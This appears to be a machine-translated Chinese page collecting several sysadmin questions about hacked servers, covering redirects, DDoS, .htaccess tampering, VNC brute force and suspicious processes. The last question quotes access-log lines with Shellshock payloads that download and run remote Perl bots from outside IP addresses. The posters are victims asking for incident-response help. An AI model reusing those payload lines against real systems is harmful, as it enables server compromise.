可能重复: 我的服务器被黑了应急 我有一个expression式引擎网站,我尝试清理。 该数据库已经给了很多新的用户,所以似乎数据库已被黑客/链接添加。 一个主要问题是,在Google中点击的网站正在被绕过。 所有访问者正被redirect到另一个网站。 这里是search: http : //tinyurl.com/72nzutj 。 第一个网站是有问题的..他们被redirect到的网站是http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555我一直在试图find这个redirect的所有文件和数据库,但我没有运气。 这不是一个.htaccessredirect,我已经检查和确认。 但是,我还没有能够find文件或数据库中的JScript或PHP的redirect到目前为止..可能是隐藏的,因为base64或打包encryption。 想法? NB没有可用的清洁数据库版本
可能重复: 我得到DDoSed,我应该怎么办? 我正在使用2个VPS服务器。 我的域名在一段时间内不可用。 1小时,Somtimes 30分钟,页面加载速度缓慢。 我联系了托pipe公司,他们说我正在接受DDoS攻击。 我尝试ping我的网站,ping结果是这样的: 包数:发送= 4,接收= 0,丢失= 4 <100%损失)。 Somtimes 2损失,3或更less。 我正在使用Plesk Panel,Debian,目前在两台服务器上都有2G内存。 另外我已经尝试了一些ping泛滥工具来垃圾邮件的IP,并没有任何人avalialbe。 托pipe公司让我来解决这个问题,他们说是不是他们的问题。 我怎么能阻止呢? www.topwebhosts.org/tools/apf-bfd-ddos-rootkit.php 这个问题有一个有趣的文章。 任何人都可以build议我吗?
可能重复: 我的服务器被黑了应急 似乎有一个恶意脚本访问我的服务器和编辑我的所有托pipe网站的.htaccess文件redirect到垃圾邮件链接。 什么是阻止这种情况发生的最好方法? 我已经更改了我的服务器访问详细信息,包括控制面板和FTP访问,并尝试使用以下代码更新现有的.htaccess文件,但似乎仍然在发生变化。 # BEGIN WordPress RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress # protect wp-config.php <files wp-config.php> Order deny,allow Deny from all </files> # Protect the htaccess file <files .htaccess> order allow,deny deny from all </files> # protect from sql injection Options […]
Apache的error_log显示如下所示的行: — snip — which: no ruby in (/sbin:/usr/sbin:/bin:/usr/bin) which: no locate in (/sbin:/usr/sbin:/bin:/usr/bin) which: no suidperl in (/sbin:/usr/sbin:/bin:/usr/bin) which: no get in (/sbin:/usr/sbin:/bin:/usr/bin) which: no fetch in (/sbin:/usr/sbin:/bin:/usr/bin) which: no links in (/sbin:/usr/sbin:/bin:/usr/bin) which: no lynx in (/sbin:/usr/sbin:/bin:/usr/bin) which: no lwp-mirror in (/sbin:/usr/sbin:/bin:/usr/bin) which: no lwp-download in (/sbin:/usr/sbin:/bin:/usr/bin) which: no kav in (/sbin:/usr/sbin:/bin:/usr/bin) — […]
这些天我的主机(a2hosting)与托pipe我的VPS的节点有问题,在此期间,我的用户注意到一个奇怪的行为,而不是在节点上出现问题时发生的几次重新启动。 这一切都开始时,我的一些网站用户联系我说,他们在网站上看到不同的图像(完全随机图像,不涉及我的网站),因为我不在家我closures从我的主机控制面板的服务器,担心黑客攻击。 几个小时后,我的用户告诉我服务器重新启动了(尽pipe我没有提到),而且我的用户说清除caching后他们没有看到他们的图像有什么问题了。 我一读到这个就closures它,甚至更害怕黑客攻击(但由于没有更改密码而感到困惑) 最后,当我回家时,我再次启动服务器,并检查日志。 没有可疑的日志活动,没有人login除了我之外的服务器,没有文件(我告诉那些不同的文件)已经改变。 唯一奇怪的是: 我有2个apache日志文件,称为20150518-access.log和20150517-access.log(和我有一些datedate5月18日在其他日志,如上所述),这意味着我的系统临时有5月18日为date现在已经回到四月了,而且它自己也改变了)。 我的一些日志将这个http://mjzone.net/Files/lognull.png作为重新启动之后的日志条目 我已经做了一些检查,我的系统似乎很好,没有比我的访问,没有发现可疑文件(甚至没有我被告知的图像是不同的),我花了我所有的星期天检查可疑的活动,但我找不到任何。 所以,我已经打开了一个主机上的票,他们说,他们不能给我任何信息,但它更有可能是一个安全漏洞,而不是一个问题挂钩节点问题(除了重新启动,他们证实这是一个问题在他们身边),但老实说我不相信…虽然我可以想到自动重新启动和暂时更改的date之间的联系,我找不到任何相关的图像(这是唯一的这让我想到了一个安全问题,虽然我不能想到黑客会改变一堆随机图像和服务器date,但是然后恢复一切回来)。 我的问题是: 有什么方法可以让人们看到随机图像,而不是实际的图像可能会链接到服务器/节点的问题,而不是安全漏洞? 除了系统日志和最近更改的文件以外,还能检查什么,以确保没有什么奇怪的事情发生?
当我从Outlook发送邮件时,会生成额外的邮件并发送给未知的ID。 为什么会发生这种情况,如何防止这种情况发生。
我有一台Linux机器作为testing服务器运行。 我的盒子直接在这台机器上redirect我的端口80。 我创build它来训练所有types的东西(raid,tcp …)。 最近我试图连接到我的机器在VNC,我得到了一个错误“太多authentication失败”,所以我检查日志,我有一个可怕的惊喜; 有人正试图通过在VNC中的蛮力连接到我的机器。 这里是这个日志的简短摘录: 04/01/17 13:53:56 Got connection from client 111.73.46.90 04/01/17 13:53:56 Using protocol version 3.3 04/01/17 13:53:56 Too many authentication failures – client rejected 04/01/17 13:53:56 Client 111.73.46.90 gone 04/01/17 13:53:56 Statistics: 04/01/17 13:53:56 framebuffer updates 0, rectangles 0, bytes 0 04/01/17 13:53:57 Got connection from client 111.73.46.90 04/01/17 13:53:57 […]
我的cPanel网站被黑了。 攻击者已经改变了我的cPanel密码。 他怎么能这样做,我怎样才能访问我的网站? 谢谢。
可能重复: 我的服务器被黑了应急 首先一些背景信息。 我们讨论的服务器运行的是CentOS 5.6,端口22上的SSH可以通过互联网访问(坏,我们知道),端口8080上的Apache可以通过互联网和MySQL访问,无法访问通过互联网。 前几天这个testing服务器被黑了,由于一个非常简单的密码(是的,你会发现它遍布互联网,坏…),所以我们改变了它。 当然,这次我们input了一个真正的密码,这是你在互联网上找不到的东西。 到目前为止,每个人都没有问题。 我们扫描了rootkit,删除了脚本小子已经下载的一些东西(他们使用SSHlogin),好吧,有点像通常你会做的事情。 不过,今天我们看到被黑客入侵的服务器正在使用这么多的stream量,我们只能检查一切是否正常。 所以,我们使用SSHlogin,我们看到了什么? 是的:“从xxx.xxx.xxx.xxx上次login2月21日22:08”。 也就是说,在更改密码之前,与用于login系统的IP相同。 但是,这次脚本小子安装了一些恶意软件。 他们显然创造了一些帐户,一个被称为甲骨文 。 它包含文件夹.mozilla其中包含文件夹lala 。 打开该文件夹,我们看到了脚本小子使用真正不安全的密码帐户下载的相同内容。尝试执行ps -x ,我们看到了zmeu进程正在运行。 而不仅仅是一个,想像一个50左右。 现在来一些问题:-) 那些剧本小子是怎么login的? 没有SSH密钥上传和密码更改。 但是,他们确实设法login,毕竟… “zmeu”是做什么的? 看起来这是与phpmyadmin有关,但我们不使用phpmyadmin。 我们已经停止了所有的“zmeu”进程,删除了文件和帐户并重启了服务器。 networking完全没有了 只要这个黑客入侵的服务器连接到networking,一切都很慢。 看起来像已经通过删除zmeu进程已经修复。
我新手到networking编程,所以我设置了一个Apache2服务器为我的做法。 似乎有人成功地破解我的Apache服务器。 我有我的access.log中注意到以下行: 81.169.174.52 – – [22/Jan/2015:17:24:39 +0200] "GET /cgi-bin/contact.cgi HTTP/1.1" 200 1531 "-" "() { :;};/usr/ bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://202.191.121.230/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'" 也是这一个: 80.92.84.168 – – [22/Jan/2015:18:21:08 +0200] "GET /phppath/cgi_wrapper HTTP/1.0" 200 3360 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESSX\";system(\"wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm – […]